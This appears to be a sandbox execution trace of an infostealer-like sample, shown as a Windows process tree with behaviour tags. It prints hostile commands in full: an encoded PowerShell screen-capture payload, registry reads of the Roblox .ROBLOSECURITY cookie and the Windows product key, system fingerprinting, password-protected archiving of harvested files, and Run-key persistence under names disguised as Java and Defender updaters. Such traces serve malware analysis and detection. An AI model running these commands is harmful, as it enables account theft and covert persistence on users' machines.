C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=101⤵PID:4692
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eboqnksw\eboqnksw.cmdline"102⤵PID:5888
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\eboqnksw\CSCE2E16EF5A474B27AF78F85EA9185DA6.TMP"103⤵PID:1100
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"100⤵PID:1368
-
C:\Windows\system32\tree.comtree /A /F101⤵PID:720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"100⤵PID:5784
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts101⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"100⤵PID:3684
-
C:\Windows\system32\tree.comtree /A /F101⤵PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"100⤵PID:2856
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts101⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"100⤵PID:5220
-
C:\Windows\system32\tree.comtree /A /F101⤵PID:2152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"100⤵PID:5360
-
C:\Windows\system32\tasklist.exetasklist /FO LIST101⤵
- Enumerates processes with tasklist
PID:5872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"100⤵PID:5352
-
C:\Windows\system32\tree.comtree /A /F101⤵PID:5400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"100⤵PID:5212
-
C:\Windows\system32\tree.comtree /A /F101⤵PID:5680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"100⤵PID:6044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY101⤵
- Command and Scripting Interpreter: PowerShell
PID:5200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"100⤵PID:3316
-
C:\Windows\system32\getmac.exegetmac101⤵PID:4996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"100⤵PID:5868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY101⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\wCztR.zip" *"100⤵PID:5368
-
C:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI40882\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\wCztR.zip" *101⤵PID:4780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"100⤵PID:3160
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption101⤵PID:1428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"100⤵PID:720
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory101⤵PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"100⤵PID:528
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid101⤵PID:852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"100⤵PID:2972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1101⤵PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER101⤵
- Command and Scripting Interpreter: PowerShell
PID:5272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"100⤵PID:1096
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name101⤵
- Detects videocard installed
PID:6100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"100⤵PID:3108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault101⤵PID:4816
-
-
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"98⤵PID:5468
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"98⤵
- Checks computer location settings
PID:3960 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FCE.tmp\3FCF.tmp\3FD0.bat C:\Windows\system32\java.exe"99⤵
- Drops file in System32 directory
PID:4972 -
C:\Windows\system32\timeout.exetimeout 1100⤵
- Delays execution with timeout.exe
PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f100⤵PID:5336
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f100⤵PID:6052
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f100⤵PID:2816
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f100⤵PID:2216
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"100⤵PID:5868
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"101⤵PID:3924
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"100⤵PID:5276
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"100⤵
- Checks computer location settings
PID:368 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\478E.tmp\478F.tmp\4790.bat C:\Windows\system32\java.exe"101⤵
- Drops file in System32 directory
PID:3220 -
C:\Windows\system32\timeout.exetimeout 1102⤵
- Delays execution with timeout.exe
PID:1768
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f102⤵PID:3204
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f102⤵PID:4612
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f102⤵
- Adds Run key to start application
PID:696
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f102⤵
- Adds Run key to start application
PID:5996
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"102⤵PID:6048
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"103⤵PID:3048
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"102⤵PID:6056
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"102⤵
- Checks computer location settings
PID:3696 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5191.tmp\5192.tmp\5193.bat C:\Windows\system32\java.exe"103⤵PID:3080
-
C:\Windows\system32\timeout.exetimeout 1104⤵
- Delays execution with timeout.exe
PID:1016
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f104⤵
- Adds Run key to start application
PID:3260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f104⤵PID:5632
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f104⤵PID:6136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f104⤵
- Adds Run key to start application
PID:2516
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"104⤵PID:2828
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"105⤵PID:2684
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"104⤵PID:3440
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"104⤵
- Checks computer location settings
PID:5636 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5700.tmp\5701.tmp\5702.bat C:\Windows\system32\java.exe"105⤵
- Drops file in System32 directory
PID:4828 -
C:\Windows\system32\timeout.exetimeout 1106⤵PID:5716
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f106⤵PID:5328
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f106⤵
- Adds Run key to start application
PID:3096
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f106⤵PID:6108
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f106⤵PID:2072
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"106⤵PID:3584
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"107⤵PID:5432
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"106⤵PID:3460
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"106⤵
- Checks computer location settings
PID:1484 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F6C.tmp\5F6D.tmp\5F6E.bat C:\Windows\system32\java.exe"107⤵
- Drops file in System32 directory
PID:2020 -
C:\Windows\system32\timeout.exetimeout 1108⤵
- Delays execution with timeout.exe
PID:5880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f108⤵
- Adds Run key to start application
PID:1556
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f108⤵
- Adds Run key to start application
PID:1120
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f108⤵PID:1696
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f108⤵PID:856
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"108⤵PID:3132
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"109⤵PID:1948
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"108⤵PID:1136
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"108⤵
- Checks computer location settings
PID:392 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\66BF.tmp\66C0.tmp\66C1.bat C:\Windows\system32\java.exe"109⤵
- Drops file in System32 directory
PID:5924 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1110⤵PID:3868
-
-
C:\Windows\system32\timeout.exetimeout 1110⤵PID:2604
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f110⤵PID:1448
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f110⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f110⤵PID:4252
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f110⤵
- Adds Run key to start application
PID:5320
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"110⤵PID:1560
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"111⤵PID:5476
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"110⤵PID:5540
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"110⤵
- Checks computer location settings
PID:5144 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E70.tmp\6E71.tmp\6E72.bat C:\Windows\system32\java.exe"111⤵PID:5024
-
C:\Windows\system32\timeout.exetimeout 1112⤵PID:468
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f112⤵PID:376
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f112⤵PID:1428
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f112⤵PID:6060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f112⤵
- Adds Run key to start application
PID:5604
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"112⤵PID:5380
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"113⤵PID:1384
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"112⤵PID:4288
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"112⤵
- Checks computer location settings
PID:1552 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\76BD.tmp\76BE.tmp\76BF.bat C:\Windows\system32\java.exe"113⤵PID:1156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1114⤵PID:5872
-
-
C:\Windows\system32\timeout.exetimeout 1114⤵PID:528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f114⤵PID:3564
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f114⤵PID:2152
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f114⤵PID:1740
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f114⤵PID:5504
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"114⤵PID:5188
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"115⤵PID:5968
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"114⤵PID:5236
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"114⤵
- Checks computer location settings
PID:5768 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DE1.tmp\7DE2.tmp\7DE3.bat C:\Windows\system32\java.exe"115⤵PID:2480
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1116⤵PID:5272
-
-
C:\Windows\system32\timeout.exetimeout 1116⤵PID:4368
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f116⤵PID:3992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f116⤵PID:2072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f116⤵PID:3528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f116⤵
- Adds Run key to start application
PID:4544
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"116⤵PID:5764
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"117⤵PID:2492
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"116⤵PID:1656
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"116⤵
- Checks computer location settings
PID:5876 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\863D.tmp\863E.tmp\863F.bat C:\Windows\system32\java.exe"117⤵
- Drops file in System32 directory
PID:2128 -
C:\Windows\system32\timeout.exetimeout 1118⤵PID:5540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f118⤵PID:368
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f118⤵PID:5944
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f118⤵PID:3584
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f118⤵
- Adds Run key to start application
PID:3328
-
-
